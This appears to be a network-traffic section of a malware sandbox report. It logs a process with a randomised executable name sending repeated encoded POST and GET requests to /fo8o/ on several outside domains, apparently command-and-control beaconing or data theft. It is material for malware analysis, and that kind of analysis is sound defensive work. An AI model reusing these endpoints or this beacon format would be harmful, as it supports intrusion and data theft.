                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:01:46.826838017 CEST | 367 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:46 GMT
                                                    Server: Apache
                                                    Content-Length: 203
                                                    Connection: close
                                                    Content-Type: text/html; charset=iso-8859-1
                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    29 | 192.168.2.11 | 49741 | 23.227.38.74 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:52.330249071 CEST | 791 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donnavariedades.com
                                                    Origin: http://www.donnavariedades.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.donnavariedades.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDoJ5s7Urt+exgYf25cE19f7MIPNx+UklqoQ==
                                                    Jun 9, 2024 18:01:53.021562099 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:52 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    Vary: Accept-Encoding
                                                    x-frame-options: DENY
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    x-request-id: a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912
                                                    server-timing: processing;dur=14
                                                    content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a97cfdca-a47c-4ecf-8773-9416f446df81-1717948912
                                                    x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1
                                                    Content-Encoding: gzip
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sXh2KeFPggnvWIuk4DuHrhCdvCizRRXVrZEHB9oeJ9mw


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    30 | 192.168.2.11 | 49742 | 23.227.38.74 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:54.865632057 CEST | 811 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donnavariedades.com
                                                    Origin: http://www.donnavariedades.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.donnavariedades.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoEKbrQOdVAjzReqgnR4+CqwinR3DtBF8XU=
                                                    Jun 9, 2024 18:01:55.553605080 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:55 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    Vary: Accept-Encoding
                                                    x-frame-options: DENY
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    x-request-id: a465852f-406c-4919-a086-9337ee5c2b6a-1717948915
                                                    server-timing: processing;dur=10
                                                    content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a465852f-406c-4919-a086-9337ee5c2b6a-1717948915
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=a465852f-406c-4919-a086-9337ee5c2b6a-1717948915
                                                    x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1
                                                    Content-Encoding: gzip
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XQfET4ahT70%2B6CXmzMiQ0YdI2xhMj5Qte%2BlNtaPbW


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    31 | 192.168.2.11 | 49743 | 23.227.38.74 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:01:57.550462008 CEST | 1824 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.donnavariedades.com
                                                    Origin: http://www.donnavariedades.com
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.donnavariedades.com/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1= [TRUNCATED]
                                                    Jun 9, 2024 18:01:58.227813959 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                    Date: Sun, 09 Jun 2024 16:01:58 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    Vary: Accept-Encoding
                                                    x-frame-options: DENY
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    x-request-id: 15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918
                                                    server-timing: processing;dur=16
                                                    content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918
                                                    x-content-type-options: nosniff
                                                    x-download-options: noopen
                                                    x-permitted-cross-domain-policies: none
                                                    x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=15bfcb5f-08d5-474e-9efd-f3a3ef6d642f-1717948918
                                                    x-dc: gcp-us-south1,gcp-us-east1,gcp-us-east1
                                                    Content-Encoding: gzip
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd9AGpCCqtgQRFCV1u0V2XfpVVbjuAUBO0%2B%2FLFhYx


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    32 | 192.168.2.11 | 49744 | 23.227.38.74 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:02:00.085303068 CEST | 511 | OUT | GET /fo8o/?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.donnavariedades.com
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:02:00.753556967 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                    Date: Sun, 09 Jun 2024 16:02:00 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    X-Sorting-Hat-PodId: 311
                                                    X-Sorting-Hat-ShopId: 87850025272
                                                    X-Storefront-Renderer-Rendered: 1
                                                    location: https://donnavariedades.com/fo8o?Zl4h1=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pThuOdW8gsoVxhB1RUuBib7W4ojAwcpXLMk0=&Pbw=PLVXbnG85
                                                    x-redirect-reason: https_required
                                                    x-frame-options: DENY
                                                    content-security-policy: frame-ancestors 'none';
                                                    x-shopid: 87850025272
                                                    x-shardid: 311
                                                    vary: Accept
                                                    powered-by: Shopify
                                                    server-timing: processing;dur=16;desc="gc:1", db;dur=6, asn;desc="8100", edge;desc="DFW", country;desc="US", pageType;desc="404", servedBy;desc="qnq2", requestID;desc="c7018738-bc5d-432d-8e0e-246b17f15ef1-1717948920"
                                                    x-dc: gcp-us-south1,gcp-us-central1,gcp-us-central1
                                                    x-request-id: c7018738-bc5d-432d-8e0e-246b17f15ef1-1717948920
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yb5fScUvnW%2BrgCHE%2FkA6PF3N8BPf2KHisi7YQHe2EhRzK%2B%2F7%2FuWlrqWqG90wmwjArNGCdIFTd4MKo7zk4nQ2ATmJHcx0dYWgP4qwjiQ4dBm9E%2BVD%2BiLcRsPr6vdybue4KmsQMS%2BL14kD"}],"group":"cf-nel","


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    33 | 192.168.2.11 | 49745 | 34.111.148.214 | 80 | 6576 | C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Jun 9, 2024 18:02:06.181360960 CEST | 767 | OUT | POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.660danm.top
                                                    Origin: http://www.660danm.top
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 202
                                                    Referer: http://www.660danm.top/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Ascii: Zl4h1=gB7R/rxgLjsQk8IqYjCzrknqxlBx5pZjH7HQo33VnNJrdvL+ikkOqwuxHd2C331E7UlCpyeZU7/7b1UGBanUP6PfRpqSTp9iGJh/JEAOotxPQSq0CbDn3L2E+co5V9gvoqkyInTCi5sUU0dUs298HUy03NFf5DoNUl3sPvilAQImsR5I0iF91WSZWXQUHDP+/g==
                                                    Jun 9, 2024 18:02:06.957585096 CEST | 728 | IN | HTTP/1.1 405 Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:06 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                    Session ID: 34  Source IP: 192.168.2.11  Source Port: 49746  Destination IP: 34.111.148.214  Destination Port: 80  PID: 6576  Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Jun 9, 2024 18:02:08.859790087 CEST  787  OUT  POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.660danm.top
                                                    Origin: http://www.660danm.top
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 222
                                                    Referer: http://www.660danm.top/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 74 72 64 50 62 2b 6a 6e 38 4f 70 77 75 78 49 39 32 62 6f 48 31 4e 37 55 70 4b 70 79 79 5a 55 37 62 37 62 77 77 47 42 70 2f 54 4a 36 50 64 64 4a 71 51 63 4a 39 69 47 4a 68 2f 4a 45 45 30 6f 74 35 50 51 69 36 30 44 34 62 67 72 62 32 44 33 38 6f 35 66 64 67 72 6f 71 6b 55 49 6d 2f 34 69 36 45 55 55 32 46 55 73 45 46 37 4e 55 79 2b 36 74 45 31 39 54 5a 35 4d 6c 4b 42 57 4d 57 43 49 41 63 39 6b 33 6f 53 6b 42 4d 71 32 46 61 62 43 78 78 6b 4f 79 71 33 6b 6d 74 62 6c 43 32 6d 35 6e 76 48 5a 54 4a 2b 59 43 76 30 31 75 45 3d
                                                    Data Ascii: Zl4h1=gB7R/rxgLjsQncYqaEWzqEnr7FBxwJZnH7LQozPFn/trdPb+jn8OpwuxI92boH1N7UpKpyyZU7b7bwwGBp/TJ6PddJqQcJ9iGJh/JEE0ot5PQi60D4bgrb2D38o5fdgroqkUIm/4i6EUU2FUsEF7NUy+6tE19TZ5MlKBWMWCIAc9k3oSkBMq2FabCxxkOyq3kmtblC2m5nvHZTJ+YCv01uE=
                                                    Jun 9, 2024 18:02:09.645539045 CEST  176  IN  HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:09 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jun 9, 2024 18:02:09.645685911 CEST  559  IN  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session ID: 35  Source IP: 192.168.2.11  Source Port: 49747  Destination IP: 34.111.148.214  Destination Port: 80  PID: 6576  Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Jun 9, 2024 18:02:11.395791054 CEST  1800  OUT  POST /fo8o/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Accept-Encoding: gzip, deflate, br
                                                    Host: www.660danm.top
                                                    Origin: http://www.660danm.top
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Content-Length: 1234
                                                    Referer: http://www.660danm.top/fo8o/
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Data Raw: 5a 6c 34 68 31 3d 67 42 37 52 2f 72 78 67 4c 6a 73 51 6e 63 59 71 61 45 57 7a 71 45 6e 72 37 46 42 78 77 4a 5a 6e 48 37 4c 51 6f 7a 50 46 6e 2f 6c 72 64 38 44 2b 6a 47 38 4f 6f 77 75 78 46 64 32 47 6f 48 30 4e 37 56 42 4f 70 79 4f 6a 55 35 54 37 61 57 38 47 48 63 54 54 63 4b 50 64 56 70 71 64 54 70 39 33 47 4e 46 37 4a 45 30 30 6f 74 35 50 51 6b 57 30 45 72 44 67 70 62 32 45 2b 63 6f 31 56 39 67 54 6f 71 39 68 49 6d 36 61 69 4b 6b 55 55 57 56 55 2f 48 39 37 42 55 79 77 39 74 45 74 39 54 56 6d 4d 6c 57 6a 57 4e 7a 58 49 43 4d 39 68 52 46 51 68 41 4d 57 6b 30 57 32 5a 58 6f 4b 47 79 6d 48 67 57 78 59 69 6a 71 67 37 79 54 37 5a 6d 35 78 4e 53 6a 49 70 72 4f 47 63 38 44 63 57 73 6a 55 47 63 58 65 7a 52 68 39 4e 42 4c 31 4c 31 58 78 39 49 4b 55 6c 62 34 44 77 33 36 37 49 69 6a 4a 4b 69 58 76 7a 73 7a 68 5a 4e 74 54 53 6e 6f 71 39 7a 49 56 52 78 46 2b 6d 48 30 71 4f 61 63 77 37 4b 71 74 36 58 4d 41 72 49 30 30 52 6b 2b 58 57 34 33 57 7a 4b 46 53 47 4a 63 67 33 34 55 67 36 58 43 74 74 76 4f 70 59 48 44 73 [TRUNCATED]
                                                    Data Ascii: Zl4h1= [TRUNCATED]
                                                    Jun 9, 2024 18:02:12.174079895 CEST  176  IN  HTTP/1.1 405 Method Not Allowed
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:12 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 559
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Jun 9, 2024 18:02:12.176837921 CEST  559  IN  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41
                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to d


                                                    Session ID: 36  Source IP: 192.168.2.11  Source Port: 49748  Destination IP: 34.111.148.214  Destination Port: 80  PID: 6576  Process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    Jun 9, 2024 18:02:13.937263012 CEST  503  OUT  GET /fo8o/?Zl4h1=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrY/DTXti4BJBda4ZDKyYIpNZZRE2pdJDqsa0=&Pbw=PLVXbnG85 HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Host: www.660danm.top
                                                    Connection: close
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                    Jun 9, 2024 18:02:14.734581947 CEST  1236  IN  HTTP/1.1 200 OK
                                                    Server: nginx/1.20.2
                                                    Date: Sun, 09 Jun 2024 16:02:14 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 5161
                                                    Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                                                    Vary: Accept-Encoding
                                                    ETag: "65a4939c-1429"
                                                    Cache-Control: no-cache
                                                    Accept-Ranges: bytes
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 [TRUNCATED]
                                                    Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.1",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("s
                                                    Jun 9, 2024 18:02:14.734642982 CEST  1236  IN  Data Raw: 63 72 69 70 74 22 29 5b 30 5d 3b 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 65 2c 6f 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75
                                                    Data Ascii: cript")[0];o.parentNode.insertBefore(e,o)}function baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc"
                                                    Jun 9, 2024 18:02:14.734678984 CEST  1236  IN  Data Raw: 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2c 69 73 55 43 3a 65 28 29 2c 69 73 51 75 61 72 6b 3a 72 28 29 2c 69 73 5f 64 75 61 6e 6e 65 69 3a 65 28 29 7c 7c 72 28 29 7d 2c 6e 29 2c 74 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20
                                                    Data Ascii: avigator.userAgent,isUC:e(),isQuark:r(),is_duannei:e()||r()},n),t=[];for(var i in a)a.hasOwnProperty(i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://t
                                                    Jun 9, 2024 18:02:14.734715939 CEST  400  IN  Data Raw: 72 28 76 61 72 20 71 73 4c 69 73 74 3d 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 7c 7c 22 3f 22 29 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 73 70 6c 69 74 28 22 26 22 29 2c 6c 65 6e 3d 71 73 4c 69 73 74 2e 6c 65 6e 67
                                                    Data Ascii: r(var qsList=(window.location.search||"?").substring(1).split("&"),len=qsList.length,i=0;i<len;i++){var e=qsList[i];if("debug=true"===e){var $head=document.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setA
                                                    Jun 9, 2024 18:02:14.755141020 CEST  1236  IN  Data Raw: 68 65 61 64 2e 6c 61 73 74 43 68 69 6c 64 29 2c 24 73 63 72 69 70 74 31 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b
                                                    Data Ascii: head.lastChild),$script1.onload=function(){var e=document.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};bre
